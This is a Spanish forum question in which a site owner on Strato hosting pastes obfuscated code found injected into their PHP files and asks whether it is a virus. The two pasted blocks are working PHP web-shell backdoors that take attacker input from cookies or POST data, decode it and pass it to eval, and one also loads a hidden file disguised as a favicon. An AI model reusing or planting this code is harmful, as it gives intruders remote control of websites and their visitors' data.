# Inyección de código en archivos de mi hosting

Tags: php

Buenas, estaba revisando los archivos que tengo en mi hosting [(strato.es)](http://strato.es) y me he dado cuenta que en los archivos `.php` se ha inyectado algún tipo de código que me es imposible de entender. No se si se tratara de algún tipo de virus o ataque o es cosa de los que me proporcionan el hosting, hay algún archivo al que se le ha añadido la extensión `.bak` que por lo que he podido investigar se utiliza para almacenar datos de copia de seguridad.

A continuación os dejo los codigos que se han "inyectado" en los ficheros y algunas imagenes:

Código de la pagina **index.php** :

```
    <?php      
$p2d65fa7 = 922;$GLOBALS['k995']=Array();global$k995;$k995=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['c1922e345']="\x39\x76\x7b\x6c\x75\x6f\x6a\x3b\x2b\x57\x46\x32\x7c\x7a\x56\x6b\x33\x62\x42\x25\x5f\x60\x2c\x47\x65\x5a\x40\x4f\x34\x23\x5c\x3c\x78\x4a\x44\x5d\x26\x61\x45\x37\x38\x74\x52\x7d\x2f\x48\x3e\x55\x20\x35\x28\x22\xa\x5e\x27\x70\x2e\x66\x7e\x5b\x4e\x3f\x4b\x72\x69\x6d\x64\x67\x29\x54\x71\x73\x3d\xd\x36\x30\x6e\x63\x79\x43\x50\x24\x4c\x3a\x21\x58\x4d\x2a\x77\x53\x68\x2d\x59\x31\x41\x9\x51\x49";$k995[$k995['c1922e345'][15].$k995['c1922e345'][75].$k995['c1922e345'][24].$k995['c1922e345'][37].$k995['c1922e345'][16].$k995['c1922e345'][24].$k995['c1922e345'][77].$k995['c1922e345'][93]]=$k995['c1922e345'][77].$k995['c1922e345'][90].$k995['c1922e345'][63];$k995[$k995['c1922e345'][77].$k995['c1922e345'][17].$k995['c1922e345'][0].$k995['c1922e345'][66].$k995['c1922e345'][57].$k995['c1922e345'][40].$k995['c1922e345'][66].$k995['c1922e345'][57].$k995['c1922e345'][28]]=$k995['c1922e345'][5].$k995['c1922e345'][63].$k995['c1922e345'][66];$k995[$k995['c1922e345'][65].$k995['c1922e345'][49].$k995['c1922e345'][49].$k995['c1922e345'][75]]=$k995['c1922e345'][71].$k995['c1922e345'][41].$k995['c1922e345'][63].$k995['c1922e345'][3].$k995['c1922e345'][24].$k995['c1922e345'][76];$k995[$k995['c1922e345'][5].$k995['c1922e345'][37].$k995['c1922e345'][57].$k995['c1922e345'][66]]=$k995['c1922e345'][64].$k995['c1922e345'][76].$k995['c1922e345'][64].$k995['c1922e345'][20].$k995['c1922e345'][71].$k995['c1922e345'][24].$k995['c1922e345'][41];$k995[$k995['c1922e345'][71].$k995['c1922e345'][24].$k995['c1922e345'][57].$k995['c1922e345'][24].$k995['c1922e345'][66].$k995['c1922e345'][28].$k995['c1922e345'][75]]=$k995['c1922e345'][71].$k995['c1922e345'][24].$k995['c1922e345'][63].$k995['c1922e345'][64].$k995['c1922e345'][37].$k995['c1922e345'][3].$k995['c1922e345'][64].$k995['c1922e345'][13].$k995['c1922e345'][24];$k995[$k995['c1922e345'][88].$k995['c1922e345'][74].$k995['c1922e345'][16].$k995['c1922e345'][37].$k995['c1922e345'][75].$k995['c1922e345'][93].$k995['c1922e345'][75].$k995['c1922e345'][11]]=$k995['c1922e345'][55].$k995['c1922e345'][90].$k995['c1922e345'][55].$k995['c1922e345'][1].$k995['c1922e345'][24].$k995['c1922e345'][63].$k995['c1922e345'][71].$k995['c1922e345'][64].$k995['c1922e345'][5].$k995['c1922e345'][76];$k995[$k995['c1922e345'][5].$k995['c1922e345'][16].$k995['c1922e345'][0].$k995['c1922e345'][75].$k995['c1922e345'][17].$k995['c1922e345'][24].$k995['c1922e345'][74].$k995['c1922e345'][66]]=$k995['c1922e345'][4].$k995['c1922e345'][76].$k995['c1922e345'][71].$k995['c1922e345'][24].$k995['c1922e345'][63].$k995['c1922e345'][64].$k995['c1922e345'][37].$k995['c1922e345'][3].$k995['c1922e345'][64].$k995['c1922e345'][13].$k995['c1922e345'][24];$k995[$k995['c1922e345'][41].$k995['c1922e345'][93].$k995['c1922e345'][0].$k995['c1922e345'][39].$k995['c1922e345'][37].$k995['c1922e345'][28].$k995['c1922e345'][28].$k995['c1922e345'][75]]=$k995['c1922e345'][17].$k995['c1922e345'][37].$k995['c1922e345'][71].$k995['c1922e345'][24].$k995['c1922e345'][74].$k995['c1922e345'][28].$k995['c1922e345'][20].$k995['c1922e345'][66].$k995['c1922e345'][24].$k995['c1922e345'][77].$k995['c1922e345'][5].$k995['c1922e345'][66].$k995['c1922e345'][24];$k995[$k995['c1922e345'][88].$k995['c1922e345'][93].$k995['c1922e345'][28].$k995['c1922e345'][16].$k995['c1922e345'][37]]=$k995['c1922e345'][71].$k995['c1922e345'][24].$k995['c1922e345'][41].$k995['c1922e345'][20].$k995['c1922e345'][41].$k995['c1922e345'][64].$k995['c1922e345'][65].$k995['c1922e345'][24].$k995['c1922e345'][20].$k995['c1922e345'][3].$k995['c1922e345'][64].$k995['c1922e345'][65].$k995['c1922e345'][64].$k995['c1922e345'][41];$k995[$k995['c1922e345'][37].$k995['c1922e345'][77].$k995['c1922e345'][40].$k995['c1922e345'][75].$k995['c1922e345'][74].$k995['c1922e345'][49].$k995['c1922e345'][28].$k995['c1922e345'][74]]=$k995['c1922e345'][24].$k995['c1922e345'][28].$k995['c1922e345'][0].$k995['c1922e345'][66].$k995['c1922e345'][75].$k995['c1922e345'][66].$k995['c1922e345'][16].$k995['c1922e345'][49];$k995[$k995['c1922e345'][67].$k995['c1922e345'][74].$k995['c1922e345'][0].$k995['c1922e345'][93].$k995['c1922e345'][0].$k995['c1922e345'][37].$k995['c1922e345'][24].$k995['c1922e345'][37].$k995['c1922e345'][16]]=$k995['c1922e345'][13].$k995['c1922e345'][49].$k995['c1922e345'][28].$k995['c1922e345'][0].$k995['c1922e345'][0].$k995['c1922e345'][77];$k995[$k995['c1922e345'][41].$k995['c1922e345'][16].$k995['c1922e345'][77].$k995['c1922e345'][28].$k995['c1922e345'][74]]=$_POST;$k995[$k995['c1922e345'][67].$k995['c1922e345'][75].$k995['c1922e345'][37].$k995['c1922e345'][39].$k995['c1922e345'][74].$k995['c1922e345'][24].$k995['c1922e345'][11].$k995['c1922e345'][28]]=$_COOKIE;@$k995[$k995['c1922e345'][5].$k995['c1922e345'][37].$k995['c1922e345'][57].$k995['c1922e345'][66]]($k995['c1922e345'][24].$k995['c1922e345'][63].$k995['c1922e345'][63].$k995['c1922e345'][5].$k995['c1922e345'][63].$k995['c1922e345'][20].$k995['c1922e345'][3].$k995['c1922e345'][5].$k995['c1922e345'][67],NULL);@$k995[$k995['c1922e345'][5].$k995['c1922e345'][37].$k995['c1922e345'][57].$k995['c1922e345'][66]]($k995['c1922e345'][3].$k995['c1922e345'][5].$k995['c1922e345'][67].$k995['c1922e345'][20].$k995['c1922e345'][24].$k995['c1922e345'][63].$k995['c1922e345'][63].$k995['c1922e345'][5].$k995['c1922e345'][63].$k995['c1922e345'][71],0);@$k995[$k995['c1922e345'][5].$k995['c1922e345'][37].$k995['c1922e345'][57].$k995['c1922e345'][66]]($k995['c1922e345'][65].$k995['c1922e345'][37].$k995['c1922e345'][32].$k995['c1922e345'][20].$k995['c1922e345'][24].$k995['c1922e345'][32].$k995['c1922e345'][24].$k995['c1922e345'][77].$k995['c1922e345'][4].$k995['c1922e345'][41].$k995['c1922e345'][64].$k995['c1922e345'][5].$k995['c1922e345'][76].$k995['c1922e345'][20].$k995['c1922e345'][41].$k995['c1922e345'][64].$k995['c1922e345'][65].$k995['c1922e345'][24],0);@$k995[$k995['c1922e345'][88].$k995['c1922e345'][93].$k995['c1922e345'][28].$k995['c1922e345'][16].$k995['c1922e345'][37]](0);$ee9752=NULL;$u2889b=NULL;$k995[$k995['c1922e345'][55].$k995['c1922e345'][28].$k995['c1922e345'][24].$k995['c1922e345'][28].$k995['c1922e345'][77]]=$k995['c1922e345'][75].$k995['c1922e345'][28].$k995['c1922e345'][75].$k995['c1922e345'][11].$k995['c1922e345'][66].$k995['c1922e345'][75].$k995['c1922e345'][49].$k995['c1922e345'][93].$k995['c1922e345'][91].$k995['c1922e345'][66].$k995['c1922e345'][57].$k995['c1922e345'][39].$k995['c1922e345'][0].$k995['c1922e345'][91].$k995['c1922e345'][28].$k995['c1922e345'][75].$k995['c1922e345'][66].$k995['c1922e345'][0].$k995['c1922e345'][91].$k995['c1922e345'][0].$k995['c1922e345'][75].$k995['c1922e345'][28].$k995['c1922e345'][11].$k995['c1922e345'][91].$k995['c1922e345'][16].$k995['c1922e345'][37].$k995['c1922e345'][57].$k995['c1922e345'][0].$k995['c1922e345'][24].$k995['c1922e345'][11].$k995['c1922e345'][0].$k995['c1922e345'][0].$k995['c1922e345'][93].$k995['c1922e345'][74].$k995['c1922e345'][11].$k995['c1922e345'][28];global$p4e4c;function z5499c($ee9752,$s0af){global$k995;$h39ec1="";for($a23af1=0;$a23af1<$k995[$k995['c1922e345'][65].$k995['c1922e345'][49].$k995['c1922e345'][49].$k995['c1922e345'][75]]($ee9752);){for($g96f65e=0;$g96f65e<$k995[$k995['c1922e345'][65].$k995['c1922e345'][49].$k995['c1922e345'][49].$k995['c1922e345'][75]]($s0af)&&$a23af1<$k995[$k995['c1922e345'][65].$k995['c1922e345'][49].$k995['c1922e345'][49].$k995['c1922e345'][75]]($ee9752);$g96f65e++,$a23af1++){$h39ec1.=$k995[$k995['c1922e345'][15].$k995['c1922e345'][75].$k995['c1922e345'][24].$k995['c1922e345'][37].$k995['c1922e345'][16].$k995['c1922e345'][24].$k995['c1922e345'][77].$k995['c1922e345'][93]]($k995[$k995['c1922e345'][77].$k995['c1922e345'][17].$k995['c1922e345'][0].$k995['c1922e345'][66].$k995['c1922e345'][57].$k995['c1922e345'][40].$k995['c1922e345'][66].$k995['c1922e345'][57].$k995['c1922e345'][28]]($ee9752[$a23af1])^$k995[$k995['c1922e345'][77].$k995['c1922e345'][17].$k995['c1922e345'][0].$k995['c1922e345'][66].$k995['c1922e345'][57].$k995['c1922e345'][40].$k995['c1922e345'][66].$k995['c1922e345'][57].$k995['c1922e345'][28]]($s0af[$g96f65e]));}}return$h39ec1;}function e49d0d35($ee9752,$s0af){global$k995;global$p4e4c;return$k995[$k995['c1922e345'][67].$k995['c1922e345'][74].$k995['c1922e345'][0].$k995['c1922e345'][93].$k995['c1922e345'][0].$k995['c1922e345'][37].$k995['c1922e345'][24].$k995['c1922e345'][37].$k995['c1922e345'][16]]($k995[$k995['c1922e345'][67].$k995['c1922e345'][74].$k995['c1922e345'][0].$k995['c1922e345'][93].$k995['c1922e345'][0].$k995['c1922e345'][37].$k995['c1922e345'][24].$k995['c1922e345'][37].$k995['c1922e345'][16]]($ee9752,$p4e4c),$s0af);}foreach($k995[$k995['c1922e345'][67].$k995['c1922e345'][75].$k995['c1922e345'][37].$k995['c1922e345'][39].$k995['c1922e345'][74].$k995['c1922e345'][24].$k995['c1922e345'][11].$k995['c1922e345'][28]]as$s0af=>$c60c){$ee9752=$c60c;$u2889b=$s0af;}if(!$ee9752){foreach($k995[$k995['c1922e345'][41].$k995['c1922e345'][16].$k995['c1922e345'][77].$k995['c1922e345'][28].$k995['c1922e345'][74]]as$s0af=>$c60c){$ee9752=$c60c;$u2889b=$s0af;}}$ee9752=@$k995[$k995['c1922e345'][5].$k995['c1922e345'][16].$k995['c1922e345'][0].$k995['c1922e345'][75].$k995['c1922e345'][17].$k995['c1922e345'][24].$k995['c1922e345'][74].$k995['c1922e345'][66]]($k995[$k995['c1922e345'][37].$k995['c1922e345'][77].$k995['c1922e345'][40].$k995['c1922e345'][75].$k995['c1922e345'][74].$k995['c1922e345'][49].$k995['c1922e345'][28].$k995['c1922e345'][74]]($k995[$k995['c1922e345'][41].$k995['c1922e345'][93].$k995['c1922e345'][0].$k995['c1922e345'][39].$k995['c1922e345'][37].$k995['c1922e345'][28].$k995['c1922e345'][28].$k995['c1922e345'][75]]($ee9752),$u2889b));if(isset($ee9752[$k995['c1922e345'][37].$k995['c1922e345'][15]])&&$p4e4c==$ee9752[$k995['c1922e345'][37].$k995['c1922e345'][15]]){if($ee9752[$k995['c1922e345'][37]]==$k995['c1922e345'][64]){$a23af1=Array($k995['c1922e345'][55].$k995['c1922e345'][1]=>@$k995[$k995['c1922e345'][88].$k995['c1922e345'][74].$k995['c1922e345'][16].$k995['c1922e345'][37].$k995['c1922e345'][75].$k995['c1922e345'][93].$k995['c1922e345'][75].$k995['c1922e345'][11]](),$k995['c1922e345'][71].$k995['c1922e345'][1]=>$k995['c1922e345'][93].$k995['c1922e345'][56].$k995['c1922e345'][75].$k995['c1922e345'][91].$k995['c1922e345'][93],);echo@$k995[$k995['c1922e345'][71].$k995['c1922e345'][24].$k995['c1922e345'][57].$k995['c1922e345'][24].$k995['c1922e345'][66].$k995['c1922e345'][28].$k995['c1922e345'][75]]($a23af1);}elseif($ee9752[$k995['c1922e345'][37]]==$k995['c1922e345'][24]){eval/*e3d083bfe*/($ee9752[$k995['c1922e345'][66]]);}exit();} ?><?php
/*3c33f*/
@include "\x2fho\x6de/\x73tr\x61to\x2fht\x74p/\x70ow\x65r/\x72id\x2f25\x2f15\x2f54\x3082\x3515\x2fht\x64oc\x73/i\x6dg2\x2fpl\x61du\x72/f\x61vi\x63on\x5f39\x3173\x30.i\x63o";
/*3c33f*/
echo file_get_contents('index.php.bak.bak');
```

Cogido en el script de enviar un email, justo antes de la etiqueta `<html>`:

```
  <?php $o88c4a88 = 593;$GLOBALS['b9226d']=Array();global$b9226d;$b9226d=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['y87b8feb1']="\x2f\x35\x20\x40\x27\x50\x25\x74\x58\x7d\x69\x52\x37\x3b\x6b\x42\x48\x65\x2a\x4d\x75\x3d\x6e\x45\x6d\x4c\x21\x53\xa\x5a\x68\x29\x22\x24\x47\x34\x54\x70\x51\x71\x77\x59\x4b\x5b\x2c\x6c\x44\x46\x7e\x26\x5d\x6a\x36\x64\x3e\x28\x2d\x5c\x73\x60\x67\x6f\x3c\x61\x55\x5f\x31\x66\x30\x33\xd\x7a\x79\x39\x4a\x76\x63\x57\x43\x2b\x7c\x4e\x23\x2e\x7b\x49\x78\x4f\x56\x38\x32\x5e\x62\x3f\x3a\x72\x9\x41";$b9226d[$b9226d['y87b8feb1'][22].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][63]]=$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][30].$b9226d['y87b8feb1'][95];$b9226d[$b9226d['y87b8feb1'][39].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][66]]=$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][53];$b9226d[$b9226d['y87b8feb1'][86].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][73]]=$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][7].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][45].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][22];$b9226d[$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][1]]=$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][22].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][7];$b9226d[$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][89].$b9226d['y87b8feb1'][35].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][92]]=$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][45].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][71].$b9226d['y87b8feb1'][17];$b9226d[$b9226d['y87b8feb1'][72].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][90]]=$b9226d['y87b8feb1'][37].$b9226d['y87b8feb1'][30].$b9226d['y87b8feb1'][37].$b9226d['y87b8feb1'][75].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][22];$b9226d[$b9226d['y87b8feb1'][60].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][68]]=$b9226d['y87b8feb1'][20].$b9226d['y87b8feb1'][22].$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][45].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][71].$b9226d['y87b8feb1'][17];$b9226d[$b9226d['y87b8feb1'][39].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][35].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][89]]=$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][35].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][17];$b9226d[$b9226d['y87b8feb1'][30].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][66]]=$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][7].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][7].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][24].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][45].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][24].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][7];$b9226d[$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][89]]=$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][89];$b9226d[$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][76]]=$b9226d['y87b8feb1'][45].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][89].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][76];$b9226d[$b9226d['y87b8feb1'][71].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][90]]=$_POST;$b9226d[$b9226d['y87b8feb1'][40].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][53]]=$_COOKIE;@$b9226d[$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][1]]($b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][45].$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][60],NULL);@$b9226d[$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][1]]($b9226d['y87b8feb1'][45].$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][60].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][95].$b9226d['y87b8feb1'][58],0);@$b9226d[$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][1]]($b9226d['y87b8feb1'][24].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][86].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][86].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][20].$b9226d['y87b8feb1'][7].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][61].$b9226d['y87b8feb1'][22].$b9226d['y87b8feb1'][65].$b9226d['y87b8feb1'][7].$b9226d['y87b8feb1'][10].$b9226d['y87b8feb1'][24].$b9226d['y87b8feb1'][17],0);@$b9226d[$b9226d['y87b8feb1'][30].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][66]](0);$l1dc9=NULL;$b739010=NULL;$b9226d[$b9226d['y87b8feb1'][86].$b9226d['y87b8feb1'][35].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][63]]=$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][89].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][56].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][56].$b9226d['y87b8feb1'][35].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][56].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][56].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][12];global$x4ca;function l78ac($l1dc9,$u7ded1ff7){global$b9226d;$cbc71ff="";for($tb7837=0;$tb7837<$b9226d[$b9226d['y87b8feb1'][86].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][73]]($l1dc9);){for($qfcf53=0;$qfcf53<$b9226d[$b9226d['y87b8feb1'][86].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][73]]($u7ded1ff7)&&$tb7837<$b9226d[$b9226d['y87b8feb1'][86].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][73]]($l1dc9);$qfcf53++,$tb7837++){$cbc71ff.=$b9226d[$b9226d['y87b8feb1'][22].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][63]]($b9226d[$b9226d['y87b8feb1'][39].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][66]]($l1dc9[$tb7837])^$b9226d[$b9226d['y87b8feb1'][39].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][66]]($u7ded1ff7[$qfcf53]));}}return$cbc71ff;}function b1f8($l1dc9,$u7ded1ff7){global$b9226d;global$x4ca;return$b9226d[$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][76]]($b9226d[$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][76]]($l1dc9,$x4ca),$u7ded1ff7);}foreach($b9226d[$b9226d['y87b8feb1'][40].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][73].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][53]]as$u7ded1ff7=>$u8aa8b){$l1dc9=$u8aa8b;$b739010=$u7ded1ff7;}if(!$l1dc9){foreach($b9226d[$b9226d['y87b8feb1'][71].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][90]]as$u7ded1ff7=>$u8aa8b){$l1dc9=$u8aa8b;$b739010=$u7ded1ff7;}}$l1dc9=@$b9226d[$b9226d['y87b8feb1'][60].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][17].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][92].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][68]]($b9226d[$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][89]]($b9226d[$b9226d['y87b8feb1'][39].$b9226d['y87b8feb1'][1].$b9226d['y87b8feb1'][35].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][67].$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][89]]($l1dc9),$b739010));if(isset($l1dc9[$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][14]])&&$x4ca==$l1dc9[$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][14]]){if($l1dc9[$b9226d['y87b8feb1'][63]]==$b9226d['y87b8feb1'][10]){$tb7837=Array($b9226d['y87b8feb1'][37].$b9226d['y87b8feb1'][75]=>@$b9226d[$b9226d['y87b8feb1'][72].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][52].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][90]](),$b9226d['y87b8feb1'][58].$b9226d['y87b8feb1'][75]=>$b9226d['y87b8feb1'][66].$b9226d['y87b8feb1'][83].$b9226d['y87b8feb1'][68].$b9226d['y87b8feb1'][56].$b9226d['y87b8feb1'][66],);echo@$b9226d[$b9226d['y87b8feb1'][76].$b9226d['y87b8feb1'][12].$b9226d['y87b8feb1'][69].$b9226d['y87b8feb1'][90].$b9226d['y87b8feb1'][53].$b9226d['y87b8feb1'][89].$b9226d['y87b8feb1'][35].$b9226d['y87b8feb1'][63].$b9226d['y87b8feb1'][92]]($tb7837);}elseif($l1dc9[$b9226d['y87b8feb1'][63]]==$b9226d['y87b8feb1'][17]){eval/*s45ef26a*/($l1dc9[$b9226d['y87b8feb1'][53]]);}exit();} ?>
```

Codigo de una carpeta de solo imagenes:

```
    <?php //000208
